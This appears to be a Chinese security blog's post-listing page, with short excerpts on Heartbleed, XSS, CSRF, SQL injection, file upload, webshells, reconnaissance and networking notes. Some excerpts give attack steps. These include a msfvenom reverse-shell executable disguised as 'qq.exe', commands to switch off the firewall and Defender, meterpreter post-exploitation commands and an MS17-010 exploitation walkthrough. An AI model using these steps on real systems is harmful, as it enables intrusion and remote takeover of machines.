- 博客(21)
- 收藏
- 关注
原创 心脏滴血漏洞理解
文章目录一、漏洞简介二、漏洞分析一、漏洞简介OpenSSL“心脏出血”漏洞(CVE-2014-0160)。这个漏洞使攻击者能够从内存中读取多达64 KB的数据。只要有这个漏洞的存在,在无需任何特权信息或身份验证的环境下,我们就可以从目标机器获取到用户名与密码、电子邮件以及重要的商业文档和通信等数据。OpenSSL 有一个叫Heartbeat (心跳检测)的拓展,所谓心跳检测,就是建立一个 Client Hello 问询来检测对方服务器是不是正常在线 ,服务器发回 Server hello,表明
2022-03-31 17:55:31 862
原创 获取网站后台权限理解
后台常见位置查找猜解常用路径Admin、admin_login.asp、admin_login.php部分网站默认都是admin目录后台。虽然开发人员安全意识逐渐完善,但还是有相当一部分网站管理员直接就用默认的路径。我们找后台时从常见的默认界面入手往往会有意外收获。robots.txtrobots.txt是一种存放于网站根目录下的ASCII编码的文本文件,它通常告诉网络搜索引擎,此网站中的哪些内容是不能被搜索引擎获取的,哪些是可以被获取的。管理员们为了让搜索引擎不要收录admin页面而在robots
2022-03-31 14:47:09 6697
原创 基于流量的分析理解
基于流量的攻击溯源分析 一、Wirshark工具1.1 Wirshark的作用1.2 WirShark操作布局一、Wirshark工具1.1 Wirshark的作用Wireshark是一个可以进行数据包的捕获和分析的软件。网卡在对接收到的数据包进行处理之前,会先对它们的目的地址进行检查,如果目的地址不为本机的话,就会丢弃这些数据,相反就会将这些数据包交给操作系统,操作系统再将其分配给应用程序。如果启动了WireShark的话,操作系统会将经过网卡的所有数据包都复制一份提供给它,这样我们就可以在Wi
2022-03-31 13:40:44 5841
原创 入侵检测系统(IDS)与入侵防御系统(IPS)的简单理解
文章目录1.入侵检测系统(IDS)2.入侵防御系统(IPS)1.入侵检测系统(IDS)IDS(Intrusion Detection Systems),中文意思是“入侵检测系统”。依照一定的安全策略,对网络、系统的运行状况进行监视,尽可能发现各种攻击企图、攻击行为或者攻击结果,以保证网络系统资源的机密性、完整性和可用性。假如防火墙是一幢大厦的门锁,那么IDS就是这栋大楼里的监视系统。一旦非法份子进入了大楼,或内部人员有越界行为,只有实时监视系统才能发现情况并发出警告。与防火墙不同的是,IDS入
2022-03-29 20:53:19 11175
原创 文件上传漏洞理解
文章目录(一)文件上传漏洞简介(二)文件上传漏洞绕过2.1、客户端绕过2.2、服务端MIME类型检测2.3、Web容器解析2.3.1、IIS 6.0解析漏洞2.3.2、Apache解析漏洞2.3.3、Nginx解析漏洞(三)漏洞利用总结(四)漏洞防御(一)文件上传漏洞简介文件长传漏洞是指攻击者上传了一个可执行的文件到服务器并执行。这里上传的文件可以是木马、病毒、恶意脚本或这Webshell等(二)文件上传漏洞绕过2.1、客户端绕过一般都是在网页上写一段 javascript 脚本,校验上传文
2022-03-21 15:09:30 2898
原创 CSRF漏洞理解
文章目录(一)CSRF简介(二)CSRF防御(一)CSRF简介跨站请求伪造 (Cross-Site Request Forgery, CSRF),攻击者盗用了你的身份,CSRF通过伪装来自受信任用户的请求来利用受信任的网站,以你的名义发送恶意请求。条件: 用户访问站点A并产生了cookie(有效);用户没有退出A同时访问了B用户输入账号信息请求登录A网站。A网站验证用户信息,通过验证后返回给用户一个cookie在未退出网站A之前,在同一浏览器中请求了黑客构造的恶意网站BB网站收到用户请求
2022-03-20 21:19:02 175
原创 XSS漏洞理解
文章目录(一)XSS简介(二)反射型XSS(三)存储型XSS(四)DOM型XSS(五)XSS危害(六)XSS绕过(七)XSS防御(一)XSS简介跨站脚本攻击XSS(Cross Site Scripting)。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页面时,嵌入Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。XSS通常被用于获取Cookie、以受攻击者的身份进行操作等行为。XSS分为:反射型 、存储型 、DOM型(二)反射型XSS非持久化,需要欺骗用户
2022-03-20 20:15:45 740
原创 信息收集之端口信息
文章目录1、 Nmap/Masscan2、在线扫描网站3、端口服务和利用方式一些特定端口默认会开启一些特定服务。端口信息收集可以帮助我们找到更多目标网站的功能点,更全面地对目标网站进行测试。1、 Nmap/Masscan例如:Nmap简单扫描:nmap -sV IP/域名端口状态open(开放的) 意味着目标机器上的应用程序正在该端口监听连接 / 报文filtered(被过滤的) 意味着防火墙,过滤器或者其它网络障碍阻止了该端口被访问,Nmap 无法得知 它是 open(开放的
2022-03-17 22:41:42 2474
原创 信息收集之子域名
文章目录(一)子域名收集1.1 Google语法1.2 网络搜索引擎探测1.3 IP反查1.4 DNS流量1.5 爆破(一)子域名收集子域名:域名按照层级可以分为顶级域、主域名、子域名等 。例如.com是顶级域,主域名baicu.com,子域名则是在主域名的前面添加自定义名称,例如像map.baicu.com、music.baicu.com 这一类都可统称为子域名。开头带的www又是什么呢?其实从整体上来说,这是一个URL地址,不是域名,www.baicu.com这种形式的域名并不是三级域名,
2022-03-17 21:04:28 2956
原创 区块链技术简单理解
(一)区块链技术1.1 区块链概念区块链可以借由密码学,串接并保护内容的串联交易记录(又称区块)。在区块链中,区块内容具有难以篡改的特性,每一个区块都包含了前一个区块的加密散列、相应时间戳记以及交易数据(通常用Hash树计算的散列值表示)。用区块链串接的分布式账本能让交易双方有效地记录交易,且可永久查验。1.2 区块链原理该技术具备泛中心化、开放互信、不可篡改、高可靠等特点。区块链技术可以认为是使用数学方法解决信任问题,即在网络中的中心节点和信息传递通道都缺乏可信度的情况下,如何使网络中的
2022-03-16 19:35:42 10675
原创 PHP一句话木马之小马
什么是一句话木马一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测,一句话木马出现了无数中变形,但本质是不变的:木马的函数执行了我们发送的命令。我们如何发送命令,发送的命令如何执行?我们可以通过GET 、POST 、COOKIE这三种方式向一个网站提交数据,一句话木马用$_GET[’ ‘]、$_POST[’ ‘]、$_COOKIE[’ '] 接收我们传递的数据,并把接收的数据传递给一句话木马中执行命令的函数,进而执行命令。所以看到的经典一句话
2022-03-11 20:58:30 616
原创 SQL注入介绍
目录(一)SQL注入1.1 什么叫SQL注入1.2 SQL注入分类1.3 SQL漏洞探测1.4 SQL注入常用函数1.5 SQL注入防御(一)SQL注入1.1 什么叫SQL注入程序不判断和处理用户输入数据的合法性,这使得攻击者能够在管理员不知情的情况下向Web应用程序中的预定义SQL语句添加额外的SQL语句并实施非法操作,从而欺骗数据库服务器执行未经授权的任意查询, 从而进一步获取数据信息。简而言之,SQL注入是将SQL语句包含在用户输入的字符串中,如果在设计不佳的程序中忽略检查,注入的SQ
2022-03-11 16:49:51 2497
原创 kali设置桥接模式
3、在linux内设置静态ip,需要设为和你局域内网同网段,比如我的是10.6.6vi /etc/network/interfacesauto eth0iface eth0 inet static/dhcpaddress 192.xxxxnetmask 255.gateway 192.xx4、设置DNSvi /etc/resolv.conf5、重启网络service networking restartIfup eth0查看eth0是否开启作者:q1ya链接:https://www
2021-03-18 21:35:08 2219
原创 渗透操作后续阶段
netsh advfirewall set allprofiles state off关闭denfender输入shell 进入 cmdshell里面net stop windefendrun killav //关闭杀毒软件使用后渗透模块 关闭杀软run post/windows/manage/killav我靶机上是启动了360的 脚本探测不到360的存在,显示没有杀软进程远程桌面登录run post/windows/manage/enable_rdp再来到靶机看看远程桌面已经开启也
2021-03-18 21:23:25 1087
原创 计算机操作系统复习知识点大集合
文章目录一、绪论1、操作系统的定义2、操作系统的特征3、操作系统的功能4、操作系统的分类一、绪论1、操作系统的定义操作系统是将系统中的各种软、硬资源有机地组合成一个整体,合理地组织计算机的工作流程,为用户提供方便、快捷、友好的应用程序使用接口。2、操作系统的特征并发性共享性不确定性3、操作系统的功能管理调度系统资源控制和协调并发活动提供用户界面4、操作系统的分类(1)批量操作系统(2)分时操作系统(3)实时操作系统(4)个人计算机操作系统(5)网络操作系统(6)分
2020-12-19 18:45:41 6980 2
原创 计算机网络基础复习知识点集合
1. 网络层次划分为了使不同计算机厂家生产的计算机能够相互通信,以便在更大的范围内建立计算机网络,国际标准化组织(ISO)在1978年提出了"开放系统互联参考模型",即著名的OSI/RM模型(Open System Interconnection/Reference Model)。它将计算机网络体系结构的通信协议划分为七层,自下而上依次为:物理层(Physics Layer)、数据链路层(Data Link Layer)、网络层(Network Layer)、传输层(Transport Layer)、会话
2020-12-12 22:24:14 2669
原创 计算机网络安全技术复习知识点总结
1 绪论网络安全的定义模型:攻击手段:攻击方式:安全服务安全机制特定安全机制普遍的安全机制认识Internet上的严峻的安全形势并深入分析其根源造成Internet安全问题的主要原因1系统脆弱性2自然灾害3网络建造的历史原因2,网络协议基础了解网络体系结构各层的功能ARP、TCP、HTTP安全问题ARPTCPHTTP对ICMP协议的利用pingtracert3 密码学在网络安全中的应用对称密码体制/非对称密码体制一、对称加密 (Symmetric Key E
2020-11-27 18:52:51 9744
原创 Meterpreter的常用命令合集
getsystem #会自动利用各种各样的系统漏洞来进行权限提升migrate #进程id进程迁移background #把当前的会话设置为背景,需要的时候在启用getuid #查看对方正在运行的用户ps #列出所有的进程getpid #返回运行meterpreter的id号sysinfo #产看系统信息和体系结构shell #切换到cmd的系统权限方式e
2020-11-25 09:51:03 10609 2
原创 MSF生成木马渗透WIN7
生成木马使用msf模块中的msfvenom模块,生成.exe木马文件msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击主机IP地址 LPORT=4444 -f exe > /home/tim/桌面/qq.exe启动msfconsolemsfconsole设置payload参数//开启监听·use exploit/multi/handler//设置tcp监听set payload windows/meterpreter/rev
2020-11-15 22:20:47 5476
原创 计算机基础硬件知识点讲解
目录1.CPU2.内存1.CPUCPU是计算机的大脑,主要和内存进行交互,从内存中提取指令并执行它。由于访问内存获取或执行数据比执行指令花费时间长,因此所有的CPU内部都包含一些寄存器来保存关键的变量和临时结果。2.内存由于目前无法通过技术手段做到内存反应非常快速(比执行一条指令要快),又要做到足够大且价格便宜的需求,于是存储器采用一种分层次的结构:...
2020-11-15 15:50:50 4854
原创 MSF渗透Win server 2008 R2
详细步骤信息收集漏洞探测漏洞利用权限提升权限维持远程桌面痕迹清除信息收集使用nmap工具进行扫描,发现发现开放了445端口,尝试利用MS17_010漏洞。nmap –sV 目标主机IP地址漏洞探测2. 1查看漏洞模块search ms17-0102. 2使用Auxiliary模块测试目标选择Auxiliary模块use auxiliary/scanner/smb/smb_ms17_010设置目标主机IP并测试set RHOST 目标主机IP地址run漏洞利用使用ex
2020-11-15 11:02:26 7875 4
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人